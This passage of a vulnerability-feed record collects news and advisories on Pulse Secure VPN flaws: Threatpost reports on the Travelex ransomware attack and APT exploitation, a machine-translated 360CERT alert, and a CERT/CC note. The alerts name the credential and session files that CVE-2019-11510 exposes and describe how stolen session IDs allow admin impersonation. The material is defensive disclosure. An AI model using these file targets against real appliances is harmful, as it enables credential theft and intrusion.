2020](<https://twitter.com/bad_packets/status/1213536922825420800?ref_src=twsrc%5Etfw>)\n\nBad Packets [indicated](<https://twitter.com/bad_packets/status/1214255496900665344>) that this lag time could have provided the window in which the cybergang infiltrated the Travelex network \u2013 a speculation that is somewhat supported by Pulse Secure itself, which issued [a statement](<https://twitter.com/zackwhittaker/status/1214315001844031488/photo/1>) this week that it has indeed seen the Sodinokibi ransomware being delivered via exploits for the vulnerabilities.\n\n\u201cThe ransomware situation at Travelex shines a harsh spotlight on the potential devastation of a cybersecurity incident,\u201d Jonathan Knudsen, senior security strategist at Synopsys, said in an emailed statement. \u201cThe lost business and negative publicity from a scenario such as this can be crushing. Ransomware continues to be a popular tool for cybercriminals\u2026If you fall victim to a ransomware attack, you must have a plan ready to execute. The plan should include removing infected systems from your network, wiping them and reinstalling the operating system and applications, then restoring data from your backups.\u201d\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "modified": "2020-01-07T17:04:09", "published": "2020-01-07T17:04:09", "id": "THREATPOST:C535D98924152E648A3633199DAC0F1E", "href": "https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/", "type": "threatpost", "title": "Sodinokibi Ransomware Behind Travelex Fiasco: Report", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:05:06", "bulletinFamily": "info", "description": "State-sponsored advanced persistent threat (APT) groups are using flaws in outdated VPN technologies from Palo Alto Networks, Fortinet and Pulse Secure to carry out cyber attacks on targets in the United States and overseas, warned U.S. and U.K. officials.\n\nThe National Security Agency (NSA) issued a [Cybersecurity Advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) Monday about the threats and offered mitigation suggestions, warning that multiple APT actors have weaponized three critical vulnerabilities first published in August\u2013[CVE-2019-11539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539>), [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) and [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\u2013to gain access to vulnerable VPN devices. The first two affect Pulse Secure VPNs while the third affects Fortinet technology.\n\nThe National Cyber Security Centre in the United Kingdom posted [a separate warning](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) about the threats, which stem from vulnerabilities that allow \u201can attacker to retrieve arbitrary files, including those containing authentication credentials,\u201d according to the post.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaws allow an attacker to use those stolen credentials to connect to the VPN and change configuration settings or even connect to other infrastructure on the network, authorities warned. Through this unauthorized connection, an attacker could gain privileges to run secondary exploits that could allow them to access a root shell.\n\nThe U.K.\u2019s alert added two more Fortinet vulnerabilities to the list\u2013[CVE-2018-13382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13382>) and [CVE-2018-13383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13383>)\u2014as well as a Palo Alto Networks VPN flaw, [CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>).\n\nAuthorities offered a series of mitigation techniques for the vulnerabilities, which they said should be taken very seriously by users of these products.\n\nTo mitigate attacks against all of the existing threats, officials recommend a couple of basic steps: apply any existing patches for VPNs in use that could be at risk, and update existing credentials. The NSA also recommended revoking existing VPN server keys and certificates and generating new ones.\n\nA more comprehensive list of mitigation techniques recommended by the NSA also includes discouraging the use of proprietary SSLVPN/TLSVPN protocols and self-signed and wild card certificates for public-facing VPN web applications; requiring mutual certificate-based authentication so remote clients attempting to access the public-facing VPN web application must present valid client certificates to maintain a connection; and using multi-factor authentication to prevent attackers from authenticating with compromised passwords by requiring a second authentication factor.\n\nNeither the NSA nor the National Cyber Security Centre alerts identified which groups are responsible for the attacks.\n\nThe warnings come after [reports surfaced](<https://www.zdnet.com/article/a-chinese-apt-is-now-going-after-pulse-secure-and-fortinet-vpn-servers/>) last month that APT5 was targeting VPNs from Fortinet and Pulse Secure after code for two of the aforementioned vulnerabilities was disclosed in a presentation at the Black Hat Security Conference (The two companies have patched those flaws, and in the case of Pulse Secure, issued the fixes in April, three months before Black Hat.).\n\nAPT5, a Chinese state-sponsored group also known as Manganese, has been active since 2007 with a particular focus on technology and telecommunications companies, according to a [report](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf>) by FireEye.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "modified": "2019-10-08T13:44:16", "published": "2019-10-08T13:44:16", "id": "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "href": "https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/", "type": "threatpost", "title": "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-08-27T08:41:40", "bulletinFamily": "info", "description": "360CERT detected related to security researcher published the Pulse Secure SSL VPN multiple vulnerabilities. Attacks that can exploit the vulnerability to read arbitrary files, including plaintext passwords, account information and Session information, as well as into the background after the implementation of system commands. \n\n0x01 vulnerability details \nVulnerability ID: \nCVE-2019-11510 \u2013 unauthorized arbitrary file read vulnerability \nCVE-2019-11542 \u2013 after the authorization stack buffer overflow vulnerability \nCVE-2019-11539 \u2013 after the grant command injection vulnerability \nCVE-2019-11538 \u2013 authorized to arbitrarily file read vulnerability \nCVE-2019-11508 \u2013 authorized to arbitrarily file write vulnerability \nCVE-2019-11540 \u2013 after the authorization session hijacking vulnerability \nVulnerability impact: \nCVE-2019-11510: in the case of authorization can read the system any files \nthe /etc/passwd \nthe /etc/hosts \n/data/runtime/mtmp/system \n/data/runtime/mtmp/lmdb/dataa/data. mdb \n/data/runtime/mtmp/lmdb/dataa/lock. mdb \n/data/runtime/mtmp/lmdb/randomVal/data. mdb \n/data/runtime/mtmp/lmdb/randomVal/lock. mdb \nVpn user and password hash is stored mtmp/system, dataa/data. the mdb stores the user login after the cache of the plaintext password, randomVal/data. the mdb stores user Session. An attacker could exploit this vulnerability to obtain account and password login background. \nCVE-2019-11539: background a command injection vulnerability, in the use of on the step into the background after can be combined with this hole to perform system commands. \n! [](/Article/UploadPic/2019-8/201982711131470. png) \n(Note: the picture cut to the Orange Tsai BlackHat PPT) note: some exploit script has been in the online public, does not exclude that there are already hackers began exploiting the vulnerability to attack. \n\n0x02 impact version \nVulnerability number \nImpact version \nCVE-2019-11510 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX \nCVE-2019-11542 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX and Pulse Policy Secure: 9.0 RX 5.4 RX 5.3 RX 5.2 RX 5.1 RX \nCVE-2019-11539 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX and Pulse Policy Secure: 9.0 RX 5.4 RX 5.3 RX 5.2 RX 5.1 RX \nCVE-2019-11538 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX \nCVE-2019-11508 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX \nCVE-2019-11540 \nPulse Connect Secure: 9.0 RX 8.3 RX and Pulse Policy Secure: 9.0 RX 5.4 RX \n\n0x03 repair recommendations \nAuthorities have released the fix version: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/ \n\n0x04 timeline \n2019-08-10 section vulnerability details disclosed \n2019-08-21 part of the exploit script open \n2019-08-26 360CERT warning \n\n0x05 reference links \nhttps://hackerone.com/reports/591295 \nhttps://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa-pre-auth-rce-on-leading-ssl-vpns-15545 \n\n", "modified": "2019-08-27T00:00:00", "published": "2019-08-27T00:00:00", "id": "MYHACK58:62201995674", "href": "http://www.myhack58.com/Article/html/3/62/2019/95674.htm", "title": "Pulse Secure SSL VPN vulnerability alerts-a vulnerability alert-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-23T13:31:34", "bulletinFamily": "info", "description": "### Overview \n\nPulse Secure SSL VPN contains multiple vulnerabilities that can allow remote unauthenticated remote attacker to compromise the VPN server and connected clients.\n\n### Description \n\nPulse Secure released an out-of-cycle [advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) along with software patches for the various affected products on April 24, 2019. This addressed a number of vulnerabilities including a Remote Code Execution (RCE) vulnerability with pre-authentication access. This vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates. The [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) has a CVSS score of 10. \n\nThe CVEs listed in the advisory are: \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability. \n[CVE-2019-11509](<https://nvd.nist.gov/vuln/detail/CVE-2019-11509>) \\- Authenticated attacker via the admin web interface can exploit this issue to execute arbitrary code on the Pulse Secure appliance. \n[CVE-2019-11508 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>)\\- A vulnerability in the Network File Share (NFS) of Pulse Connect Secure allows an authenticated end-user attacker to upload a malicious file to write arbitrary files to the local system. \n[CVE-2019-11507](<https://nvd.nist.gov/vuln/detail/CVE-2019-11507>) \\- A XSS issue has been found in Pulse Secure Application Launcher page. Pulse Connect Secure (PCS) 8.3.x before 8.3R7.1, and 9.0.x before 9.0R3. \n[CVE-2019-11543](<https://nvd.nist.gov/vuln/detail/CVE-2019-11543>) \\- A XSS issue found the admin web console. Pulse Secure Pulse Connect Secure (PCS) 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, and 5.2RX before 5.2R12.1. \n[CVE-2019-11542](<https://nvd.nist.gov/vuln/detail/CVE-2019-11542>) \\- Authenticated attacker via the admin web interface can send a specially crafted message resulting in a stack buffer overflow. \n[CVE-2019-11541](<https://nvd.nist.gov/vuln/detail/CVE-2019-11541>) \\- Users using SAML authentication with Reuse Existing NC (Pulse) Session option may see authentication leaks \n[CVE-2019-11540](<https://nvd.nist.gov/vuln/detail/CVE-2019-11540>) \\- A vulnerability in the Pulse Secure could allow an unauthenticated, remote attacker to conduct a (end user) session hijacking attack. \n[CVE-2019-11539](<https://nvd.nist.gov/vuln/detail/CVE-2019-11539>) \\- Authenticated attacker via the admin web interface allow attacker to inject and execute command injection \n[CVE-2019-11538](<https://nvd.nist.gov/vuln/detail/CVE-2019-11538>) \\- A vulnerability in the Network File Share (NFS) of Pulse Connect Secure could allow an authenticated end-user attacker to access the contents of arbitrary files on the local file system. \n \nExploitation of these vulnerabilities was demonstrated at various events and proved to be highly impactful due to the direct access to admin privileges and the consequent ability to infect multiple VPN connected users and their desktops. Initially there was a lack of clarity about CVE-2019-11510, as to whether it can be mitigated with the requirement of a client-certificate or two-factor authentication (2FA) to prevent this attack. CERT/CC has confirmed with the vendor that this vulnerability cannot be mitigated using client certificate and furthermore there is no viable alternative to updating the Pulse Secure VPN software to a non-vulnerable version. Even if client certificates are required for user authentication, CVE-2019-11510 can be exploited by an unauthenticated remote attacker to obtain session IDs of active users stored in /data/runtime/mtmp/lmdb/randomVal/data.mdb. The attacker can use these session IDs to impersonate as one of the active users. If a Pulse Secure administrator is currently active and the administrative access is available to the attacker, attacker could gain administrative access to Pulse Secure VPN. It is highly recommended that all Pulse Secure VPN administrators perform the required upgrade on all their affected products. If your Pulse Secure VPN has been identified as End of Engineering (EOE) and End of Life (EOL), we highly recommend replacement of the VPN appliance entirely without any delay - please check Pulse Secure advisory for this information. \n \nTimelines of specific events: \nMarch 22, 2019 \u2013 Security researcher O. Tsai and M. Chang responsibly disclose vulnerability to Pulse Secure \nApril 24, 2019 - Initial advisory posted and software updates posted by Pulse Secure to the Download Center \nApril 25, 2019 \u2013 Assignment of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-11509](<https://nvd.nist.gov/vuln/detail/CVE-2019-11509>), [CVE-2019-11508](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>), [CVE-2019-11507](<https://nvd.nist.gov/vuln/detail/CVE-2019-11507>), [CVE-2019-11543](<https://nvd.nist.gov/vuln/detail/CVE-2019-11543>), [CVE-2019-11542](<https://nvd.nist.gov/vuln/detail/CVE-2019-11542>), [CVE-2019-11541](<https://nvd.nist.gov/vuln/detail/CVE-2019-11541>), [CVE-2019-11540](<https://nvd.nist.gov/vuln/detail/CVE-2019-11540>), [CVE-2019-11539](<https://nvd.nist.gov/vuln/detail/CVE-2019-11539>), [CVE-2019-11538](<https://nvd.nist.gov/vuln/detail/CVE-2019-11538>) \nApril 26, 2019 - Workaround provided for [CVE-2019-11508](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>) about disabling file sharing as a mitigation \nMay 28 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne \nJuly 31 2019 \u2013 Full RCE use of exploit demonstrated using the admin session hash to get complete shell \nAugust 8 2019 - Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation \nAugust 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade \nOctober 7, 2019 \u2013 NSA produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by Advanced Persistent Threat actors \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server. \n \n--- \n \n### Solution \n\nThere is **no** viable workaround except to apply the patch and updates provided by the vendor. It is incorrect to assume use of client certificates or two-factor authentication (2FA) can prevent [CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)RCE pre-auth vulnerability. Updates are available from [Pulse Secure Advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>). \n \n--- \n \n[CVE-2019-11508 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11508>)and [CVE-2019-11538](<https://nvd.nist.gov/vuln/detail/CVE-2019-11538>) can be mitigated by disabling File Sharing on the Pulse Secure VPN appliance. \n \nThere are **no **workarounds that address the other vulnerabilities. \n \n--- \n \n### Vendor Information\n\n927237\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Pulse Secure\n\nNotified: October 09, 2019 Updated: October 16, 2019 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS).\n\n### Vendor Information\n\nVendor has provided a detailed advisory [here](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>). \n\nThere is no workaround to address CVE-2019-11510 vulnerability. Pulse Secure recommends software upgrade as soon as possible.\n\n### Vendor References\n\n * <https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.4 | AV:N/AC:L/Au:N/C:C/I:C/A:N \nTemporal | 8.2 | E:H/RL:OF/RC:C \nEnvironmental | 8.2 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>\n * <https://cyber.gc.ca/en/alerts/active-exploitation-vpn-vulnerabilities>\n * <https://github.com/projectzeroindia/CVE-2019-11510>\n * <https://www.exploit-db.com/exploits/47297>\n * <https://www.youtube.com/watch?v=v7JUMb70ON4>\n * <https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>\n * <https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>\n\n### Acknowledgements\n\nThis vulnerability was reported by Pulse Secure, who in turn credit Orange Tsai and Meh Chang from DEVCORE research team, and Jake Valletta from FireEye\n\nThis document was written by Vijay S Sarvepalli.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2019-11510, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11510>) [CVE-2019-11509, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11509>) [CVE-2019-11508, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11508>) [CVE-2019-11507, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11507>) [CVE-2019-11543, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11543>) [CVE-2019-11542, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11542>) [CVE-2019-11541, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11541>) [CVE-2019-11540, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11540>) [CVE-2019-11539, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11539>) [CVE-2019-11538](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11538>) \n---|--- \n**Date Public:** | 2019-04-28 \n**Date First Published:** | 2019-10-16 \n**Date Last Updated: ** | 2019-10-23 02:35 UTC \n**Document Revision: ** | 33 \n", "modified": "2019-10-23T02:35:00", "published": "2019-10-16T00:00:00", "id": "VU:927237", "href": "https://www.kb.cert.org/vuls/id/927237", "type": "cert", "title": "Pulse Secure VPN contains multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
